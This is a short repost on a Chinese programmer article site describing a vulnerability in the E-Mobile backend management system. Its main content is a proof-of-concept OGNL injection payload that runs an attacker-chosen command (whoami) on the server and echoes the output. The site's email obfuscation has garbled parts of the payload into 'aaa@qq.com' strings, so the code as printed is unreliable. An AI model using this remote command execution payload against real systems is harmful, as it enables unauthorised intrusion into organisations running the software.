欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

E-Mobile 后台管理系统漏洞

程序员文章站 2022-04-30 10:36:59
...

转载:https://blog.csdn.net/qq_27446553/article/details/68203308

E-Mobile 后台管理系统漏洞
可以通过火狐hackbar插件进行验证
Poc :

message=(#aaa@qq.com@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@aaa@qq.com(@aaa@qq.com().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

复现图片如下:

E-Mobile 后台管理系统漏洞